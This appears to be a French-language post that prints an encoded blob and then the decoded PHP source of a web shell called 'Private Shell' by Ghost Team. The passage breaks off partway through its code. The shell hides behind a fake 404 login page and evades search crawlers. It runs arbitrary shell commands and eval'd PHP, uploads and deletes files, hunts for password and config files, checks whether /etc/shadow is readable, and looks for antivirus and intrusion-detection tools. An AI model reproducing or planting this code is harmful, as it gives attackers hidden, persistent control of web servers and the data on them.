O6vn0mPtfB56PZQDrneFJk56rS28trD6Zf9PWVVV9t02LFuuLF5TZNKVfOv4jdi1Rui3U4aR3yy5DWMUeBgRaxS7Uaj0vLVdgjyiDDhfc/JtlnhWdVDeyUEQErIcZIVyfaFoWk6I8B40IKiUGOe1bBFkKDUO0p7FlP4N1NDd3vIxRnAQZ2Hyyy2mbZ3AuBZ3OhZnONOjZUTi5qP1yesdlYv3a44yYWXv/i2flERHq/1/LKq3Nj0N0DGmgBvOzYZ0s9/2C1zY81BEEJnR3pLnRyTF+1O6QA15eYuChw2aLP3VtAvJZF6ogTtePN2CyYvGemiv29hWuN45NdcHnsTCb8I24brgse0a5iqguWqym8T8z279Tu5LXNwak6i2eigAfUW8rslSQ/hplPhlP0O0iAHuWlps/8/CEd/6E9ea+hSNEvePjL47O/EFM+fam/iqwwGrfRK4lzfvQyyKBlokvGTO00qNgLkQKhezwoBqNeGQ/cLyPPuoUigiFYf8AIybFxwQSKMpkIaoRY7BkIcyqStAbKbZOqwJz+XLC+J2TAMe2ZtUvwG4jFgmY7EgQare9sgru0GRkayFXcfbAGEOj3vUFemBp1RWhg9W0wzi3hJpApBaL/Qic9n+syfCAhq9GMJiaFnqMoZVHi+Yr5UUhioweAuiCk/pUL2Ahgi9zm8AYO4UOjsAA506WpjowIDjA4RUoh+QDnAjnxQxOe5zW+CrwobAiEKfDT+jo0sqsJxNIlVFnD9GT+OO8Piy2OZbQkbq0etN99t0GXoFMyYpgZrNQUh9oKvZ9mstjTvCqjGwrTGLG9+5jO2shB59SX7Qs2saUsjYtBvIZsX/Pr+1xrZH63kAYrFtL6X5IwKlouflDBK13k5vAicymaPrpYIzIMpByzrXxLvvdHNblbG93kaf6ug23mNYEeeOHF/0uO/DmvSOH1DF+7Diqn8ixdty77sjR= »))));
Qui une fois décodé donne
<?php $auth_pass = « a5e6ad95140f7742b076209a5ded20c5 »; //md5 password is my « dick »
$color = « rgb(0, 255, 0) »;
$sec = 1;
$default_action = ‘FilesMan’;
@define(‘SELF_PATH’, __FILE__);
if (strpos($_SERVER[‘HTTP_USER_AGENT’], ‘Google’) !== false) {
header(‘HTTP/1.0 404 Not Found’);
exit;
}
@session_start();
@error_reporting(0);
@ini_set(‘error_log’, NULL);
@ini_set(‘log_errors’, 0);
@ini_set(‘max_execution_time’, 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define(‘VERSION’, ‘3.5’);
if (get_magic_quotes_gpc()) {
function stripslashes_array($array) {
return is_array($array) ? array_map(‘stripslashes_array’, $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {
?>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?php echo $_SERVER[‘HTTP_HOST’] ?> Port 80</address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
</br></br></br></br></br>
<form method=post>
<input type=password name=pass>
</form>
<?php
exit;
}
if ($sec == 1 && !isset($_SESSION[md5($_SERVER[‘HTTP_HOST’]) ])) if (empty($auth_pass) || (isset($_POST[‘pass’]) && (md5($_POST[‘pass’]) == $auth_pass))) $_SESSION[md5($_SERVER[‘HTTP_HOST’]) ] = true;
else printLogin();
/*—————— Anti Crawler ————*/
if (!empty($_SERVER[‘HTTP_USER_AGENT’])) {
$userAgents = array(« Google », « Slurp », « MSNBot », « ia_archiver », « Yandex », « Rambler »);
if (preg_match(‘/’ . implode(‘|’, $userAgents) . ‘/i’, $_SERVER[‘HTTP_USER_AGENT’])) {
header(‘HTTP/1.0 404 Not Found’);
exit;
}
}
echo « <meta name=\ »ROBOTS\ » content=\ »NOINDEX, NOFOLLOW\ » /> »; //For Ensuring… Fuck all Robots…
/*—————— End of Anti Crawler —–*/
if (strtolower(substr(PHP_OS, 0, 3)) == « win ») $os = ‘win’;
else $os = ‘nix’;
$safe_mode = @ini_get(‘safe_mode’);
$disable_functions = @ini_get(‘disable_functions’);
$home_cwd = @getcwd();
if (isset($_POST[‘c’])) @chdir($_POST[‘c’]);
$cwd = @getcwd();
if ($os == ‘win’) {
$home_cwd = str_replace(« \ », » / « , $home_cwd);
$cwd = str_replace(« \ », » / « , $cwd);
}
if( $cwd[strlen($cwd) – 1] != ‘/’ )
$cwd .= ‘/’;
if($os == ‘win’) {
$aliases = array(
« ListDirectory » => « dir »,
« Findindex . phpincurrentdir » => « dir / s / w / bindex . php »,
« Find * config * . phpincurrentdir » => « dir / s / w / b * config * . php »,
« Showactiveconnections » => « netstat – an »,
« Showrunningservices » => « netstart »,
« Useraccounts » => « netuser »,
« Showcomputers » => « netview »,
« ARPTable » => « arp – a »,
« IPConfiguration » => « ipconfig / all »
);
} else {
$aliases = array(
« Listdir » => « ls – la »,
« listfileattributesonaLinuxsecondextendedfilesystem » => « lsattr – va »,
« showopenedports » => « netstat – an | grep – ilisten »,
« Find » => « »,
« findallsuidfiles » => « find / -typef – perm – 04000 – ls »,
« findsuidfilesincurrentdir » => « find . -typef – perm – 04000 – ls »,
« findallsgidfiles » => « find / -typef – perm – 02000 – ls »,
« findsgidfilesincurrentdir » => « find . -typef – perm – 02000 – ls »,
« findconfig . inc . phpfiles » => « find / -typef – nameconfig . inc . php »,
« findconfig * files » => « find / -typef – name\ »config*\ » », « find config* files in current dir » => « find . -type f -name \ »config*\ » », « find all writable folders and files » => « find / -perm -2 -ls », « find all writable folders and files in current dir » => « find . -perm -2 -ls », « find all service.pwd files » => « find / -type f -name service.pwd », « find service.pwd files in current dir » => « find . -type f -name service.pwd », « find all .htpasswd files » => « find / -type f -name .htpasswd », « find .htpasswd files in current dir » => « find . -type f -name .htpasswd », « find all .bash_history files » => « find / -type f -name .bash_history », « find .bash_history files in current dir » => « find . -type f -name .bash_history », « find all .fetchmailrc files » => « find / -type f -name .fetchmailrc », « find .fetchmailrc files in current dir » => « find . -type f -name .fetchmailrc », « Locate » => « », « locate httpd.conf files » => « locate httpd.conf », « locate vhosts.conf files » => « locate vhosts.conf », « locate proftpd.conf files » => « locate proftpd.conf », « locate psybnc.conf files » => « locate psybnc.conf », « locate my.conf files » => « locate my.conf », « locate admin.php files » => « locate admin.php », « locate cfg.php files » => « locate cfg.php », « locate conf.php files » => « locate conf.php », « locate config.dat files » => « locate config.dat », « locate config.php files » => « locate config.php », « locate config.inc files » => « locate config.inc », « locate config.inc.php » => « locate config.inc.php », « locate config.default.php files » => « locate config.default.php », « locate config* files » => « locate config », « locate .conf files » => « locate ‘.conf' », « locate .pwd files » => « locate ‘.pwd' », « locate .sql files » => « locate ‘.sql' », « locate .htpasswd files » => « locate ‘.htpasswd' », « locate .bash_history files » => « locate ‘.bash_history' », « locate .mysql_history files » => « locate ‘.mysql_history' », « locate .fetchmailrc files » => « locate ‘.fetchmailrc' », « locate backup files » => « locate backup », « locate dump files » => « locate dump », « locate priv files » => « locate priv »);
}
function ex($in) {
$out = »;
if (function_exists(‘exec’)) {
@exec($in, $out);
$out = @join( »
« , $out);
} elseif (function_exists(‘passthru’)) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists(‘system’)) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists(‘shell_exec’)) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in, « r »))) {
$out = « »;
while (!@feof($f)) $out.= fread($f, 1024);
pclose($f);
}
return $out;
}
function which($p) {
$path = ex(‘which ‘ . $p);
if (!empty($path)) return $path;
return false;
}
function printHeader() {
if (empty($_POST[‘charset’])) $_POST[‘charset’] = « UTF-8″;
global $color;
echo ‘<html><head><meta http-equiv= »Content-Type » content= »text/html; charset=’ . $_POST[‘charset’] . ‘ »><title>Private Shell By Ghost.Team – ‘ . VERSION . ‘</title>
<style>
body {background-color:#222;color:#fff;}
body,td,th { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
span,h1,a { color:’ . $color . ‘ !important; }
span { font-weight: bolder; }
h1 { padding: 2px 5px;font: 14pt Verdana;margin:0px 0 0 5px; }
div.content { padding: 5px;margin:0 5px;background: #333333;border-bottom:5px solid #444;}
a { text-decoration:none; }
a:hover { /*background:#5e5e5e;*/ }
.ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea { width:100%;height:250px;margin-top:5px;}
input, textarea, select { margin:0;color:#00ff00;background-color:#555;border:1px solid ‘ . $color . ‘; font: 9pt Monospace, »Courier New »; }
input[type= »button »]:hover,input[type= »submit »]:hover {background-color:’ . $color . ‘;color:#000;}
form { margin:0px; }
#toolsTbl { text-align:center; }
.toolsInp { width: 80%; }
.main th {text-align:left;background-color:#555;font-weight: bold;}
.main tr:hover{background-color:#5e5e5e;}
.main td, th{vertical-align:middle;}
.menu {background: #333;}
.menu th{padding:5px;font-weight:bold;}
.menu th:hover{background:#444;}
.l1 {background-color:#444;}
pre {font-family:Courier,Monospace;}
#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth – offsetWidth);}
.logo {text-align:center;font-size:58px;}
.logo sup {font-size: 15px;vertical-align: top;margin-left: -14px;}
.cpr {margin-bottom:5px;font-weight:bold;}
.cpb {width:34px;margin:0 5px;}
.eca1 {font-size: 16px;font-weight: bold;letter-spacing: 10px;margin: 0 2px 0 17px;text-align: center;}
.eca2 {font-size: 13px;font-weight: bold;letter-spacing: 3px;margin: 0 2px 0 7px;text-align: center;}
.npoad td {padding:0;}
</style>
<script>
function set(a,c,p1,p2,p3,charset) {
if(a != null)document.mf.a.value=a;
if(c != null)document.mf.c.value=c;
if(p1 != null)document.mf.p1.value=p1;
if(p2 != null)document.mf.p2.value=p2;
if(p3 != null)document.mf.p3.value=p3;
if(charset != null)document.mf.charset.value=charset;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
document.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = « ajax=true »;
for(i=0;i<document.mf.elements.length;i++)
params += « & »+document.mf.elements[i].name+ »= »+encodeURIComponent(document.mf.elements[i].value);
sr(« ‘ . $_SERVER[‘REQUEST_URI’] . ‘ », params);
}
function sr(url, params) {
if (window.XMLHttpRequest) {
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(« POST », url, true);
req.setRequestHeader (« Content-Type », « application/x-www-form-urlencoded »);
req.send(params);
}
else if (window.ActiveXObject) {
req = new ActiveXObject(« Microsoft.XMLHTTP »);
if (req) {
req.onreadystatechange = processReqChange;
req.open(« POST », url, true);
req.setRequestHeader (« Content-Type », « application/x-www-form-urlencoded »);
req.send(params);
}
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
//alert(req.responseText);
var reg = new RegExp(« (\d+)([\S\s]*) », « m »);
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
}
else alert(« Request error! »);
}
</script>
<head><body><div style= »position:absolute;width:100%;top:0;left:0; »><div style= »margin:5px;background:#444; »><div class= »content » style= »border-top:5px solid #444; »>
<form method=post name=mf style= »display:none; »>
<input type=hidden name=a value= »‘ . (isset($_POST[‘a’]) ? $_POST[‘a’] : ») . ‘ »>
<input type=hidden name=c value= »‘ . htmlspecialchars($GLOBALS[‘cwd’]) . ‘ »>
<input type=hidden name=p1 value= »‘ . (isset($_POST[‘p1’]) ? htmlspecialchars($_POST[‘p1’]) : ») . ‘ »>
<input type=hidden name=p2 value= »‘ . (isset($_POST[‘p2’]) ? htmlspecialchars($_POST[‘p2’]) : ») . ‘ »>
<input type=hidden name=p3 value= »‘ . (isset($_POST[‘p3’]) ? htmlspecialchars($_POST[‘p3’]) : ») . ‘ »>
<input type=hidden name=charset value= »‘ . (isset($_POST[‘charset’]) ? $_POST[‘charset’] : ») . ‘ »>
</form>’;
$freeSpace = @diskfreespace($GLOBALS[‘cwd’]);
$totalSpace = @disk_total_space($GLOBALS[‘cwd’]);
$totalSpace = $totalSpace ? $totalSpace : 1;
$disable_functions = @ini_get(‘disable_functions’);
$release = @php_uname(‘r’);
$kernel = @php_uname(‘s’);
if (!function_exists(‘posix_getegid’)) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = « ? »;
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid[‘name’];
$uid = $uid[‘uid’];
$group = $gid[‘name’];
$gid = $gid[‘gid’];
}
$cwd_links = »;
$path = explode(« / », $GLOBALS[‘cwd’]);
$n = count($path);
for ($i = 0;$i < $n – 1;$i++) {
$cwd_links.= « <a href=’#’ onclick=’g(\ »FilesMan\ »,\ » »;
for ($j = 0;$j <= $i;$j++) $cwd_links.= $path[$j] . ‘/’;
$cwd_links.= « \ »)’> » . $path[$i] . « /</a> »;
}
$charsets = array(‘UTF-8’, ‘Windows-1251’, ‘KOI8-R’, ‘KOI8-U’, ‘cp866’);
$opt_charsets = »;
foreach ($charsets as $item) $opt_charsets.= ‘<option value= »‘ . $item . ‘ » ‘ . ($_POST[‘charset’] == $item ? ‘selected’ : ») . ‘>’ . $item . ‘</option>’;
$m = array(‘Sec. Info’ => ‘SecInfo’, ‘Files’ => ‘FilesMan’, ‘Console’ => ‘Console’, ‘Sql’ => ‘Sql’, ‘Php’ => ‘Php’, ‘Bypass’ => ‘SafeMode’, ‘Safe Mode’ => ‘Bypass’, ‘String tools’ => ‘StringTools’, ‘Bruteforce’ => ‘Bruteforce’, ‘Network’ => ‘Network’, ‘Readable Dirs’ => ‘Readable’, ‘Port Scanner’ => ‘PortScanner’, ‘Symlink’ => ‘Symlink’, ‘Get User’ => ‘GetUser’, ‘Mailer’ => ‘Mailer’, ‘About’ => ‘about’);
if (!empty($GLOBALS[‘auth_pass’])) $m[‘SelfKill’] = ‘SelfRemove’;
$m[‘Logout’] = ‘Logout’;
$menu = »;
foreach ($m as $k => $v) $menu.= ‘<th><a href= »# » onclick= »g(\ » . $v . ‘\’,null,\’\’,\’\’,\’\’) »>’ . $k . ‘</a></th>’;
$drives = « »;
if ($GLOBALS[‘os’] == ‘win’) {
foreach (range(‘a’, ‘z’) as $drive) {
if (is_dir($drive . ‘:\’))
$drives .= ‘ < ahref = « # »onclick = « g(\’FilesMan\’,\ ».$drive.’:/\’) » > [‘.$drive.’] < / a > ‘;
}
$drives .= ‘ < br / >:
‘;
}
if($GLOBALS[‘os’] == ‘nix’) {
$dominios = @file_get_contents(« /etc/named.conf »);
if(!$dominios) {
$d0c = « CANT READ named.conf »;
} else {
@preg_match_all(‘ / . * ? zone »(.*?) » {/’, $dominios, $out);
$out = sizeof(array_unique($out[1]));
$d0c = $out. » Domains »;
}
} else {
$d0c = » — « ;
}
if($GLOBALS[‘os’] == ‘nix’ )
{
$usefl = »; $dwnldr = »;
if(!@ini_get(‘safe_mode’)) {
$userful = array(‘gcc’,’lcc’,’cc’,’ld’,’make’,’php’,’perl’,’python’,’ruby’,’tar’,’gzip’,’bzip’,’bzip2′,’nc’,’locate’,’suidperl’);
foreach($userful as $item) { if(which($item)) $usefl.= $item.’, ‘; }
$downloaders = array(‘wget’,’fetch’,’lynx’,’links’,’curl’,’get’,’lwp – mirror’);
foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.’, ‘; }
} else {
$usefl = ‘—— – ‘; $dwnldr = ‘—— – ‘;
}
} else {
$usefl = ‘—— – ‘; $dwnldr = ‘—— – ‘;
}
echo ‘ < tableclass = « info »cellpadding = « 3 »cellspacing = « 0 »width = « 100% » > < tr > < tdwidth = « 200px » > < divclass = « logo » > X – HATXBoomber < / div > < hrstyle = « margin: -5px 13px 2px 17px;width:130px; » > < divclass = « eca1 » > Private < / div > < divclass = « eca2 » > _Shell < sup > & reg; < / sup > < / div > < / td > < td > < tablecellpadding = « 3 »cellspacing = « 0 »class = « npoad » > < tr > < tdwidth = « 125px; » > < span > Uname < / span > < / td > < td > : < nobr > ‘.substr(@php_uname(), 0, 120).’ < / nobr > < / td > < / tr > < tr > < td > < span > User < / span > < / td > < td >:
‘.$uid.'(‘.$user.’) < span > Group: < / span > ‘.$gid.'(‘.$group.’) < / td > < / tr > < tr > < td > < span > Server < / span > < / td > < td >:
‘.@getenv(‘SERVER_SOFTWARE’).’ < / td > < / tr > < tr > < td > < span > Useful < / span > < / td > < td >:
‘.$usefl.’ < / td > < / tr > < tr > < td > < span > Downloaders < / span > < / td > < td >:
‘.$dwnldr.’ < / td > < / tr > < tr > < td > < span > Disabledfunctions < / span > < / td > < td >:
‘.($disable_functions?$disable_functions:’AllFunction Enable’).’ < / td > < / tr > < tr > < td > < span > ‘.($GLOBALS[‘os’] == ‘win’?’Drives < br / > Cwd’:’Cwd’).’ < / span > < / td > < td >:
‘.$drives. ».$cwd_links. ».viewPermsColor($GLOBALS[‘cwd’]).’ < ahref = # onclick= »g(\’FilesMan\’,\ ».$GLOBALS[‘home_cwd’].’\’,\’\’,\’\’,\’\’) »>[ home ]</a></td></tr></table></td>’.
‘<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>’ . ‘<td><nobr>: ‘ . gethostbyname($_SERVER[« HTTP_HOST »]) . ‘<br>: ‘ . $_SERVER[‘REMOTE_ADDR’] . ‘<br />: ‘ . viewSize($totalSpace) . ‘<br />: ‘ . viewSize($freeSpace) . ‘ (‘ . (int)($freeSpace / $totalSpace * 100) . ‘%)<br>: ‘ . @phpversion() . ‘ <a href=# onclick= »g(\’Php\’,null,null,\’info\’) »>[ phpinfo ]</a><br />: ‘ . ($GLOBALS[‘safe_mode’] ? ‘<font color=red>ON</font>’ : ‘<font color=’ . $color . ‘<b>OFF</b></font>’) . ‘<br />: ‘ . $d0c . ‘</nobr></td></tr></table>’ . ‘</div></div><div style= »margin:5;background:#444; »><div class= »content » style= »border-top:5px solid #444;padding:2px; »><table cellpadding= »3″ cellspacing= »0″ width= »100% » class= »menu »><tr>’ . $menu . ‘</tr></table></div></div><div style= »margin:5;background:#444; »>’;
}
function printFooter() {
$is_writable = is_writable($GLOBALS[‘cwd’]) ? « <font color=green>[ Writeable ]</font> » : « <font color=red>[ Not writable ]</font> »;
echo ‘</div><div style= »margin:5px;background:#444; »><div class= »content » style= »border-top:5px solid #444; »>
<table class= »info » id= »toolsTbl » cellpadding= »3″ cellspacing= »0″ width= »100% »>
<tr>
<td><form onsubmit= »g(null,this.c.value);return false; »><span>Change dir:</span><br><input class= »toolsInp » type=text name=c value= »‘ . htmlspecialchars($GLOBALS[‘cwd’]) . ‘ »><input type=submit value= »>> »></form></td>
<td><form onsubmit= »g(\’FilesTools\’,null,this.f.value);return false; »><span>Read file:</span><br><input class= »toolsInp » type=text name=f><input type=submit value= »>> »></form></td>
</tr>
<tr>
<td><form onsubmit= »g(\’FilesMan\’,null,\’mkdir\’,this.d.value);return false; »><span>Make dir:</span><br><input class= »toolsInp » type=text name=d><input type=submit value= »>> »></form>’ . $is_writable . ‘</td>
<td><form onsubmit= »g(\’FilesTools\’,null,this.f.value,\’mkfile\’);return false; »><span>Make file:</span><br><input class= »toolsInp » type=text name=f><input type=submit value= »>> »></form>’ . $is_writable . ‘</td>
</tr>
<tr>
<td><form onsubmit= »g(\’Console\’,null,this.c.value);return false; »><span>Execute:</span><br><input class= »toolsInp » type=text name=c value= » »><input type=submit value= »>> »></form></td>
<td><form method= »post » ENCTYPE= »multipart/form-data »>
<input type=hidden name=a value= »FilesMAn »>
<input type=hidden name=c value= »‘ . htmlspecialchars($GLOBALS[‘cwd’]) . ‘ »>
<input type=hidden name=p1 value= »uploadFile »>
<input type=hidden name=charset value= »‘ . (isset($_POST[‘charset’]) ? $_POST[‘charset’] : ») . ‘ »>
<span>Upload file:</span><br><input class= »toolsInp » type=file name=f><input type=submit value= »>> »></form>’ . $is_writable . ‘</td>
</tr>
</table></div></div>
<div style= »margin:5px;background:#444; »><div class= »content » style= »border-top:5px solid #444;text-align:center;font-weight:bold; »>Private Shell ‘ . VERSION . ‘, © Ghost Team</div></div>
</div>
</body></html>’;
}
if (!function_exists(« posix_getpwuid ») && (strpos($GLOBALS[‘disable_functions’], ‘posix_getpwuid’) === false)) {
function posix_getpwuid($p) {
return false;
}
}
if (!function_exists(« posix_getgrgid ») && (strpos($GLOBALS[‘disable_functions’], ‘posix_getgrgid’) === false)) {
function posix_getgrgid($p) {
return false;
}
}
function viewSize($s) {
if ($s >= 1073741824) return sprintf(‘%1.2f’, $s / 1073741824) . ‘ GB’;
elseif ($s >= 1048576) return sprintf(‘%1.2f’, $s / 1048576) . ‘ MB’;
elseif ($s >= 1024) return sprintf(‘%1.2f’, $s / 1024) . ‘ KB’;
else return $s . ‘ B’;
}
function perms($p) {
if (($p & 0xC000) == 0xC000) $i = ‘s’;
elseif (($p & 0xA000) == 0xA000) $i = ‘l’;
elseif (($p & 0x8000) == 0x8000) $i = ‘-‘;
elseif (($p & 0x6000) == 0x6000) $i = ‘b’;
elseif (($p & 0x4000) == 0x4000) $i = ‘d’;
elseif (($p & 0x2000) == 0x2000) $i = ‘c’;
elseif (($p & 0x1000) == 0x1000) $i = ‘p’;
else $i = ‘u’;
$i.= (($p & 0x0100) ? ‘r’ : ‘-‘);
$i.= (($p & 0x0080) ? ‘w’ : ‘-‘);
$i.= (($p & 0x0040) ? (($p & 0x0800) ? ‘s’ : ‘x’) : (($p & 0x0800) ? ‘S’ : ‘-‘));
$i.= (($p & 0x0020) ? ‘r’ : ‘-‘);
$i.= (($p & 0x0010) ? ‘w’ : ‘-‘);
$i.= (($p & 0x0008) ? (($p & 0x0400) ? ‘s’ : ‘x’) : (($p & 0x0400) ? ‘S’ : ‘-‘));
$i.= (($p & 0x0004) ? ‘r’ : ‘-‘);
$i.= (($p & 0x0002) ? ‘w’ : ‘-‘);
$i.= (($p & 0x0001) ? (($p & 0x0200) ? ‘t’ : ‘x’) : (($p & 0x0200) ? ‘T’ : ‘-‘));
return $i;
}
function viewPermsColor($f) {
if (!@is_readable($f)) return ‘<font color=#FF0000><b>’ . perms(@fileperms($f)) . ‘</b></font>’;
elseif (!@is_writable($f)) return ‘<font color=white><b>’ . perms(@fileperms($f)) . ‘</b></font>’;
else return ‘<font color=#00BB00><b>’ . perms(@fileperms($f)) . ‘</b></font>’;
}
if (!function_exists(« scandir »)) {
function scandir($dir) {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
return $files;
}
}
function actionSecInfo() {
printHeader();
echo ‘<h1>Server security information</h1><div class=content>’;
function showSecParam($n, $v) {
$v = trim($v);
if ($v) {
echo ‘<span>’ . $n . ‘: </span>’;
if (strpos($v, »
« ) === false) echo $v . ‘<br>’;
else echo ‘<pre class=ml1>’ . $v . ‘</pre>’;
}
}
showSecParam(‘Server software’, @getenv(‘SERVER_SOFTWARE’));
showSecParam(‘Disabled PHP Functions’, ($GLOBALS[‘disable_functions’]) ? $GLOBALS[‘disable_functions’] : ‘none’);
showSecParam(‘Open base dir’, @ini_get(‘open_basedir’));
showSecParam(‘Safe mode exec dir’, @ini_get(‘safe_mode_exec_dir’));
showSecParam(‘Safe mode include dir’, @ini_get(‘safe_mode_include_dir’));
showSecParam(‘cURL support’, function_exists(‘curl_version’) ? ‘enabled’ : ‘no’);
$temp = array();
if (function_exists(‘mysql_get_client_info’)) $temp[] = « MySql ( » . mysql_get_client_info() . « ) »;
if (function_exists(‘mssql_connect’)) $temp[] = « MSSQL »;
if (function_exists(‘pg_connect’)) $temp[] = « PostgreSQL »;
if (function_exists(‘oci_connect’)) $temp[] = « Oracle »;
showSecParam(‘Supported databases’, implode(‘, ‘, $temp));
echo ‘<br>’;
if ($GLOBALS[‘os’] == ‘nix’) {
$userful = array(‘gcc’, ‘lcc’, ‘cc’, ‘ld’, ‘make’, ‘php’, ‘perl’, ‘python’, ‘ruby’, ‘tar’, ‘gzip’, ‘bzip’, ‘bzip2’, ‘nc’, ‘locate’, ‘suidperl’);
$danger = array(‘kav’, ‘nod32’, ‘bdcored’, ‘uvscan’, ‘sav’, ‘drwebd’, ‘clamd’, ‘rkhunter’, ‘chkrootkit’, ‘iptables’, ‘ipfw’, ‘tripwire’, ‘shieldcc’, ‘portsentry’, ‘snort’, ‘ossec’, ‘lidsadm’, ‘tcplodg’, ‘sxid’, ‘logcheck’, ‘logwatch’, ‘sysmask’, ‘zmbscap’, ‘sawmill’, ‘wormscan’, ‘ninja’);
$downloaders = array(‘wget’, ‘fetch’, ‘lynx’, ‘links’, ‘curl’, ‘get’, ‘lwp-mirror’);
showSecParam(‘Readable /etc/passwd’, @is_readable(‘/etc/passwd’) ? « yes <a href=’#’ onclick=’g(\ »FilesTools\ », \ »/etc/\ », \ »passwd\ »)’>[view]</a> » : ‘no’);
showSecParam(‘Readable /etc/shadow’, @is_readable(‘/etc/shadow’) ? « yes <a href=’#’ onclick=’g(\ »FilesTools\ », \ »etc\ », \ »shadow\ »)’>[view]</a> » : ‘no’);
showSecParam(‘OS version’, @file_get_contents(‘/proc/version’));
showSecParam(‘Distr name’, @file_get_contents(‘/etc/issue.net’));
if (!$GLOBALS[‘safe_mode’]) {
echo ‘<br>’;
$temp = array();
foreach ($userful as $item) if (which($item)) {
$temp[] = $item;
}
showSecParam(‘Userful’, implode(‘, ‘, $temp));
$temp = array();
foreach ($danger as $item) if (which($item)) {
$temp[] = $item;
}
showSecParam(‘Danger’, implode(‘, ‘, $temp));
$temp = array();
foreach ($downloaders as $item) if (which($item)) {
$temp[] = $item;
}
showSecParam(‘Downloaders’, implode(‘, ‘, $temp));
echo ‘<br/>’;
showSecParam(‘Hosts’, @file_get_contents(‘/etc/hosts’));
showSecParam(‘HDD space’, ex(‘df -h’));
showSecParam(‘Mount options’, @file_get_contents(‘/etc/fstab’));
}
} else {
showSecParam(‘OS Version’, ex(‘ver’));
showSecParam(‘Account Settings’, ex(‘net accounts’));
showSecParam(‘User Accounts’, ex(‘net user’));
}
echo ‘</div>’;
printFooter();
}
function actionPhp() {
if (isset($_POST[‘ajax’])) {
$_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] = true;
ob_start();
eval($_POST[‘p1’]);
$temp = « document.getElementById(‘PhpOutput’).style.display= »;document.getElementById(‘PhpOutput’).innerHTML=' » . addcslashes(htmlspecialchars(ob_get_clean()), »
\' ») . « ‘;
« ;
echo strlen($temp), »
« , $temp;
exit;
}
printHeader();
if (isset($_POST[‘p2’]) && ($_POST[‘p2’] == ‘info’)) {
echo ‘<h1>PHP info</h1><div class=content>’;
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace(‘!body {.*}!msiU’, », $tmp);
$tmp = preg_replace(‘!a:\w+ {.*}!msiU’, », $tmp);
$tmp = preg_replace(‘!h1!msiU’, ‘h2’, $tmp);
$tmp = preg_replace(‘!td, th {(.*)}!msiU’, ‘.e, .v, .h, .h th {$1}’, $tmp);
$tmp = preg_replace(‘!body, td, th, h2, h2 {.*}!msiU’, », $tmp);
echo $tmp;
echo ‘</div><br>’;
}
if (empty($_POST[‘ajax’]) && !empty($_POST[‘p1’])) $_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] = false;
echo ‘<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit= »if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\’\’);}return false; »><textarea name=code class=bigarea id=PhpCode>’ . (!empty($_POST[‘p1’]) ? htmlspecialchars($_POST[‘p1’]) : ») . ‘</textarea><input type=submit value=Eval style= »margin-top:5px »>’;
echo ‘ <input type=checkbox name=ajax value=1 ‘ . (@$_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] ? ‘checked’ : ») . ‘> send using AJAX</form><pre id=PhpOutput style= »‘ . (empty($_POST[‘p1’]) ? ‘display:none;’ : ») . ‘margin-top:5px; » class=ml1>’;
if (!empty($_POST[‘p1’])) {
ob_start();
eval($_POST[‘p1’]);
echo htmlspecialchars(ob_get_clean());
}
echo ‘</pre></div>’;
printFooter();
}
function actionFilesMan() {
printHeader();
echo ‘<h1>File manager</h1><div class=content>’;
if (isset($_POST[‘p1’])) {
switch ($_POST[‘p1’]) {
case ‘uploadFile’:
if (!@move_uploaded_file($_FILES[‘f’][‘tmp_name’], $_FILES[‘f’][‘name’])) echo « Can’t upload file! »;
break;
break;
case ‘mkdir’:
if (!@mkdir($_POST[‘p2’])) echo « Can’t create new dir »;
break;
case ‘delete’:
function deleteDir($path) {
$path = (substr($path, -1) == ‘/’) ? $path : $path . ‘/’;
$dh = opendir($path);
while (($item = readdir($dh)) !== false) {
$item = $path . $item;
if ((basename($item) == « .. ») || (basename($item) == « . »)) continue;
$type = filetype($item);
if ($type == « dir ») deleteDir($item);
else @unlink($item);
}
closedir($dh);
rmdir($path);
}
if (is_array(@$_POST[‘f’])) foreach ($_POST[‘f’] as $f) {
$f = urldecode($f);
if (is_dir($f)) deleteDir($f);
else @unlink($f);
}
break;
case ‘paste’:
if ($_SESSION[‘act’] == ‘copy’) {
function copy_paste($c, $s, $d) {
if (is_dir($c . $s)) {
mkdir($d . $s);
$h = opendir($c . $s);
while (($f = readdir($h)) !== false) if (($f != « . ») and ($f != « .. »)) {
copy_paste($c . $s . ‘/’, $f, $d . $s . ‘/’);
}
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_SESSION[‘f’] as $f) copy_paste($_SESSION[‘cwd’], $f, $GLOBALS[‘cwd’]);
} elseif ($_SESSION[‘act’] == ‘move’) {
function move_paste($c, $s, $d) {
